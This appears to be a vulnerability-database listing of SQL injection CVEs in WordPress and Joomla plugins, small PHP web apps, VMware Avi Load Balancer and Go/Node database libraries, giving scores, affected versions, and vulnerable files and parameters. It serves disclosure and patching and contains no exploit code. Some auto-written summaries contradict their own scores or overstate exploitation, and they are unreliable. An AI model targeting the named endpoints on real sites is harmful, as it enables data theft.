NVD
EPSS 0% CVSS 8.5
HIGH This Week

A blind SQL injection vulnerability exists in wpdistillery Navigation Tree Elementor plugin (versions up to 1.0.1) that allows authenticated users to extract sensitive database information through specially crafted input. The vulnerability requires user authentication but operates over the network with low attack complexity, enabling attackers with WordPress user accounts to enumerate and exfiltrate data without direct visibility of query results. No publicly disclosed proof-of-concept or active exploitation in KEV has been confirmed at this time, though the 8.5 CVSS score and SQL injection nature warrant immediate patching.

SQLi WordPress PHP
NVD
EPSS 0% CVSS 7.6
HIGH This Week

Blind SQL Injection vulnerability in Suhas Surse WP Employee Attendance System affecting versions through 3.5, allowing authenticated attackers with high privileges to extract sensitive database information. While the CVSS score of 7.6 indicates moderate-to-high severity, the attack requires administrator-level credentials and the confidentiality impact is high; however, integrity and availability impacts are limited. No current KEV designation or widespread public POC availability has been reported, though the vulnerability's nature as SQL injection makes exploitation theoretically straightforward for skilled attackers.

SQLi WordPress PHP +1
NVD
EPSS 0% CVSS 9.3
CRITICAL Act Now

Critical SQL injection vulnerability in the WPCRM plugin (versions up to 3.2.0) for WordPress, affecting deployments integrating Contact Form 7 and WooCommerce. An unauthenticated remote attacker can execute arbitrary SQL commands with high confidence (CVSS 9.3, EPSS score likely elevated) to extract sensitive customer relationship and transaction data, though direct data modification and system availability impacts are limited. Immediate patching is strongly recommended for all affected installations.

WordPress SQLi Joomla +1
NVD
EPSS 0% CVSS 4.7
MEDIUM POC This Month

A vulnerability classified as critical was found in Webkul QloApps 1.6.1. Affected by this vulnerability is an unknown functionality of the file /admin/ajax_products_list.php. The manipulation of the argument packItself leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The vendor confirms the existence of this flaw but considers it a low-level issue due to admin privilege pre-requisites. Still, a fix is planned for a future release.

PHP SQLi Qloapps
NVD GitHub VulDB
EPSS 0% CVSS 7.3
HIGH POC This Week

A critical SQL injection vulnerability exists in SourceCodester Client Database Management System version 1.0 affecting the /user_customer_create_order.php file, where the user_id parameter is inadequately sanitized. An unauthenticated remote attacker can exploit this vulnerability to inject arbitrary SQL commands, potentially leading to unauthorized data access, modification, or deletion. Public disclosure and proof-of-concept availability elevate exploitation risk, though the CVSS 7.3 rating indicates moderate real-world impact rather than critical severity.

PHP SQLi Downloading Client Database Management System
NVD GitHub VulDB
EPSS 0% CVSS 7.3
HIGH POC This Week

Critical SQL injection vulnerability in code-projects Hostel Management System version 1.0, specifically in the /allocate_room.php file's 'search_box' parameter. An unauthenticated remote attacker can exploit this vulnerability to execute arbitrary SQL queries, potentially leading to unauthorized data access, modification, and system disruption. The vulnerability has been publicly disclosed with proof-of-concept code available, making it actively exploitable in the wild.

PHP SQLi Hostel Management System
NVD GitHub VulDB
EPSS 0% CVSS 7.3
HIGH POC This Week

Critical SQL injection vulnerability in PHPGurukul Nipah Virus Testing Management System version 1.0, located in the /registered-user-testing.php file where the 'testtype' parameter is improperly sanitized. An unauthenticated remote attacker can exploit this to execute arbitrary SQL queries, potentially compromising data confidentiality, integrity, and availability. The vulnerability has been publicly disclosed with proof-of-concept code available, presenting immediate exploitation risk in production environments.

PHP SQLi Nipah Virus Testing Management System
NVD GitHub VulDB
EPSS 0% CVSS 6.3
MEDIUM POC This Month

A vulnerability was found in PHPGurukul Nipah Virus Testing Management System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /bwdates-report-ds.php. The manipulation of the argument testtype leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.

PHP SQLi Nipah Virus Testing Management System
NVD GitHub VulDB
EPSS 0% CVSS 7.3
HIGH POC This Week

Critical SQL injection vulnerability in PHPGurukul Hostel Management System 1.0 affecting the login functionality (/includes/login-hm.inc.php). An unauthenticated attacker can manipulate the Username parameter to execute arbitrary SQL queries remotely, potentially compromising data confidentiality, integrity, and availability. Public exploit disclosure and active exploitation potential significantly elevate real-world risk despite a moderate CVSS score of 7.3.

PHP SQLi Hostel Management System
NVD GitHub VulDB
EPSS 0% CVSS 7.3
HIGH POC This Week

A SQL injection vulnerability (CVSS 7.3). Risk factors: public PoC available.

PHP SQLi Hostel Management System
NVD GitHub VulDB
EPSS 0% CVSS 7.3
HIGH POC This Week

A SQL injection vulnerability (CVSS 7.3). Risk factors: public PoC available.

PHP SQLi Hostel Management System
NVD GitHub VulDB
EPSS 0% CVSS 6.5
MEDIUM This Month

The Blog2Social: Social Media Auto Post & Scheduler plugin for WordPress is vulnerable to SQL Injection via the ‘prgSortPostType’ parameter in all versions up to, and including, 8.4.4 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.

WordPress SQLi PHP
NVD
EPSS 0% CVSS 6.3
MEDIUM POC This Month

A vulnerability was found in Projectworlds Life Insurance Management System 1.0. It has been rated as critical. This issue affects some unknown processing of the file /insertPayment.php. The manipulation of the argument recipt_no leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.

PHP SQLi Life Insurance Management System
NVD GitHub VulDB
EPSS 0% CVSS 6.3
MEDIUM POC This Month

A vulnerability was found in Projectworlds Life Insurance Management System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /insertNominee.php. The manipulation of the argument client_id/nominee_id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.

PHP SQLi Life Insurance Management System
NVD GitHub VulDB
EPSS 0% CVSS 6.3
MEDIUM POC This Month

A vulnerability was found in Projectworlds Life Insurance Management System 1.0. It has been classified as critical. This affects an unknown part of the file /insertClient.php. The manipulation of the argument client_id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. Other parameters might be affected as well.

PHP SQLi Life Insurance Management System
NVD GitHub VulDB
EPSS 0% CVSS 6.3
MEDIUM POC This Month

A vulnerability was found in Projectworlds Life Insurance Management System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /insertagent.php. The manipulation of the argument agent_id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.

PHP SQLi Life Insurance Management System
NVD GitHub VulDB
EPSS 0% CVSS 7.3
HIGH POC This Week

Critical SQL injection vulnerability in Chanjet CRM 1.0 affecting the /sysconfig/departmentsetting.php endpoint via the gblOrgID parameter. An unauthenticated remote attacker can manipulate this parameter to execute arbitrary SQL queries, potentially leading to unauthorized data access, modification, or deletion. The vulnerability has public exploit disclosure and demonstrates active exploitation potential, making it a high-priority remediation target despite the moderate CVSS score.

PHP SQLi Chanjet Crm
NVD GitHub VulDB
EPSS 0% CVSS 7.3
HIGH POC This Week

Critical SQL injection vulnerability in code-projects Restaurant Order System version 1.0, affecting the /tablelow.php file's ID parameter. An unauthenticated remote attacker can exploit this vulnerability to execute arbitrary SQL commands, potentially leading to unauthorized data access, modification, or deletion of the restaurant database. The vulnerability has been publicly disclosed with proof-of-concept availability, increasing real-world exploitation risk.

PHP SQLi Restaurant Order System
NVD GitHub VulDB
EPSS 0% CVSS 7.3
HIGH POC This Week

A SQL injection vulnerability (CVSS 7.3). Risk factors: public PoC available.

PHP SQLi Restaurant Order System
NVD GitHub VulDB
EPSS 0% CVSS 6.3
MEDIUM POC This Month

A vulnerability, which was classified as critical, was found in code-projects Restaurant Order System 1.0. This affects an unknown part of the file /table.php. The manipulation of the argument ID leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.

PHP SQLi Restaurant Order System
NVD GitHub VulDB
EPSS 0% CVSS 7.3
HIGH This Week

Das Parking Management System versions up to 6.2.0 contain a critical SQL injection vulnerability in the /vehicle/search API endpoint, specifically in the vehicleTypeCode parameter, allowing unauthenticated remote attackers to execute arbitrary SQL queries and potentially extract, modify, or delete database contents. The vulnerability has been publicly disclosed with proof-of-concept code available, and active exploitation is possible given the CVSS 7.3 score and low attack complexity.

SQLi Parking Management System
NVD GitHub VulDB
EPSS 0% CVSS 7.3
HIGH This Week

SQL injection vulnerability in Das Parking Management System (停车场管理系统) version 6.2.0 affecting the /Reservations/Search API endpoint. An unauthenticated remote attacker can manipulate the 'Value' parameter to execute arbitrary SQL queries, potentially leading to unauthorized data access, modification, or denial of service. Public exploit code is available and the vulnerability may be actively exploited in the wild.

SQLi Parking Management System
NVD GitHub VulDB
EPSS 0% CVSS 7.3
HIGH This Week

Critical SQL injection vulnerability in Das Parking Management System (停车场管理系统) version 6.2.0 affecting the /IntraFieldVehicle/Search API endpoint. An unauthenticated remote attacker can manipulate the 'Value' parameter to execute arbitrary SQL queries, potentially leading to unauthorized data access, modification, or deletion. The vulnerability has public exploit disclosure available and carries a CVSS score of 7.3 with demonstrated feasibility of remote exploitation.

SQLi Parking Management System
NVD GitHub VulDB
EPSS 0% CVSS 8.8
HIGH This Week

A SQL injection vulnerability in Customer Support System (CVSS 8.8) exploitable by an authenticated attacker. High-severity vulnerability requiring prompt remediation.

PHP SQLi Information Disclosure +1
NVD
EPSS 0% CVSS 9.8
CRITICAL Act Now

Critical unauthenticated SQL injection vulnerability in HAMASTAR Technology's WIMP website co-construction management platform that allows remote attackers to execute arbitrary SQL commands without authentication. Attackers can exploit this flaw to read, modify, or delete entire database contents, potentially compromising sensitive project management data, user credentials, and financial information. With a CVSS score of 9.8 and no authentication required, this vulnerability presents an immediate and severe threat to all deployed instances of the WIMP platform.

SQLi
NVD
EPSS 0% CVSS 6.3
MEDIUM POC This Month

A vulnerability was found in realguoshuai open-video-cms 1.0. It has been rated as critical. This issue affects some unknown processing of the file /v1/video/list. The manipulation of the argument sort leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

SQLi
NVD GitHub VulDB
EPSS 0% CVSS 6.3
MEDIUM POC This Month

A vulnerability has been found in codesiddhant Jasmin Ransomware up to 1.0.1 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /dashboard.php. The manipulation of the argument Search leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

PHP SQLi Jasmin Ransomware
NVD GitHub VulDB
EPSS 28% CVSS 7.3
HIGH POC THREAT Act Now

A SQL injection vulnerability (CVSS 7.3). Risk factors: EPSS 28% exploitation probability, public PoC available.

PHP SQLi Jasmin Ransomware
NVD GitHub VulDB
EPSS 0% CVSS 6.3
MEDIUM POC This Month

A vulnerability, which was classified as critical, has been found in qianfox FoxCMS up to 1.2.5. This issue affects the function batchCope of the file app/admin/controller/Download.php. The manipulation of the argument ids leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.

PHP SQLi Foxcms
NVD GitHub VulDB
EPSS 0% CVSS 7.2
HIGH This Week

AutomatorWP plugin for WordPress versions up to 5.2.3 contains a time-based SQL injection vulnerability in the field_conditions parameter that allows authenticated administrators and higher-privileged users to extract sensitive database information through insufficient input escaping and lack of prepared statements. While the CVSS score of 7.2 is moderately high, exploitation requires administrator-level access, significantly limiting real-world attack surface; no active exploitation in the wild has been confirmed at this time.

WordPress SQLi PHP +1
NVD
EPSS 0% CVSS 8.6
HIGH This Week

A SQL injection vulnerability (CWE-89) exists in the No Boss Calendar Joomla component versions prior to 5.0.7, allowing authenticated users with high privileges to execute arbitrary SQL commands through the id_module parameter. The vulnerability has a CVSS 4.0 score of 8.6 with high impact on confidentiality, integrity, and availability of the database. While the attack requires high-privilege authenticated access, successful exploitation could lead to complete database compromise, data exfiltration, or system takeover.

SQLi Joomla PHP
NVD
EPSS 0% CVSS 6.8
MEDIUM This Month

Description: VMware AVI Load Balancer contains an authenticated blind SQL Injection vulnerability. VMware has evaluated the severity of the issue to be in the Moderate severity range (https://www.broadcom.com/support/vmware-services/security-response) with a maximum CVSSv3 base score of 6.8 (https://www.first.org/cvss/calculator/3-0#CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N).

Known Attack Vectors: An authenticated malicious user with network access may be able to use specially crafted SQL queries to gain database access.

Resolution: To remediate CVE-2025-41233 apply the patches to the Avi Controller listed in the 'Fixed Version' column of the 'Response Matrix' found below.

Workarounds: None.

Additional Documentation: None.

Acknowledgements: VMware would like to thank Alexandru Copaceanu (https://www.linkedin.com/in/alexandru-copaceanu-b39aaa1a8/) for reporting this issue to us.

Notes: None.

Response Matrix (columns: Product | Version | Running On | CVE | CVSSv4 | Severity | Fixed Version | Workarounds | Additional Documents):
VMware Avi Load Balancer | 30.1.1 | Any | CVE-2025-41233 | 6.8 | Moderate | 30.1.2-2p3 | None | None
VMware Avi Load Balancer | 30.1.2 | Any | CVE-2025-41233 | 6.8 | Moderate | 30.1.2-2p3 | None | None
VMware Avi Load Balancer | 30.2.1 | Any | CVE-2025-41233 | 6.8 | Moderate | 30.2.1-2p6 | None | None
VMware Avi Load Balancer | 30.2.2 | Any | CVE-2025-41233 | 6.8 | Moderate | 30.2.2-2p5 | None | None
VMware Avi Load Balancer | 30.2.3 | Any | CVE-2025-41233 | N/A | N/A | Unaffected | None | None
VMware Avi Load Balancer | 31.1.1 | Any | CVE-2025-41233 | 6.8 | Moderate | 31.1.1-2p2 | None | None

CVSS vector for all affected rows: https://www.first.org/cvss/calculator/3-0#CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N

Release notes for the fixed versions:
30.1.2-2p3: https://techdocs.broadcom.com/us/en/vmware-security-load-balancing/avi-load-balancer/avi-load-balancer/30-1/vmware-avi-load-balancer-release-notes/release-notes-30-1-2.html
30.2.1-2p6: https://techdocs.broadcom.com/us/en/vmware-security-load-balancing/avi-load-balancer/avi-load-balancer/30-2/vmware-avi-load-balancer-release-notes/release-notes-for-avi-load-balancer-version-30-2-1.html
30.2.2-2p5: https://techdocs.broadcom.com/us/en/vmware-security-load-balancing/avi-load-balancer/avi-load-balancer/30-2/vmware-avi-load-balancer-release-notes/release-notes-for-avi-load-balancer-version-30-2-2.html
31.1.1-2p2: https://techdocs.broadcom.com/us/en/vmware-security-load-balancing/avi-load-balancer/avi-load-balancer/31-1/vmware-avi-load-balancer-release-notes/Release-Note-Section-20627.html

CWE-89 in the Avi Load Balancer component of VMware allows an authenticated attacker to execute blind SQL injections in versions 30.1.1, 30.1.2, 30.2.1, and 30.2.2 due to improper input validation, enabling unauthorized database access.

SQLi VMware
NVD
EPSS 0% CVSS 5.4
MEDIUM This Month

Multiple SQL injection vulnerabilities in the EuroInformation MoneticoPaiement module before 1.1.1 for PrestaShop allow remote attackers to execute arbitrary SQL commands via the TPE, societe, MAC, reference, or aliascb parameter to transaction.php, validation.php, or callback.php.

PHP SQLi
NVD
EPSS 0% CVSS 9.3
CRITICAL Act Now

Critical unauthenticated SQL injection vulnerability in the JEvents component for Joomla that allows remote attackers to execute arbitrary SQL queries through publicly accessible date range filtering actions. The vulnerability affects JEvents versions before 3.6.88 and 3.6.82.1, enabling attackers to extract sensitive database information, modify data, or potentially achieve remote code execution. With a CVSS score of 9.3 and network-based attack vector requiring no privileges or user interaction, this represents a severe risk to all unpatched Joomla installations using vulnerable JEvents versions.

SQLi Joomla PHP
NVD
EPSS 0% CVSS 5.4
MEDIUM POC PATCH This Month

pg-promise before 11.5.5 is vulnerable to SQL Injection due to improper handling of negative numbers.

SQLi Pg Promise
NVD GitHub
EPSS 0% CVSS 6.5
MEDIUM POC PATCH This Month

uptrace pgdriver v1.2.1 was discovered to contain a SQL injection vulnerability via the appendArg function in /pgdriver/format.go. The maintainer has stated that the issue is fixed in v1.2.15.

SQLi Pgdriver Suse
NVD GitHub
EPSS 0% CVSS 6.5
MEDIUM POC PATCH This Month

go-pg pg v10.13.0 was discovered to contain a SQL injection vulnerability via the component /types/append_value.go.

SQLi Ubuntu Debian +2
NVD GitHub
EPSS 0% CVSS 4.7
MEDIUM POC This Month

A vulnerability was found in kiCode111 like-girl 5.2.0 and classified as critical. Affected by this issue is some unknown functionality of the file /admin/ipAddPost.php. The manipulation of the argument bz/ipdz leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

PHP SQLi Like Girl
NVD GitHub VulDB
EPSS 0% CVSS 4.7
MEDIUM POC This Month

A vulnerability has been found in kiCode111 like-girl 5.2.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /admin/ImgAddPost.php. The manipulation of the argument imgDatd/imgText/imgUrl leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

PHP SQLi Like Girl
NVD GitHub VulDB

Quick Facts

Typical Severity
HIGH
Category
web
Total CVEs
4638
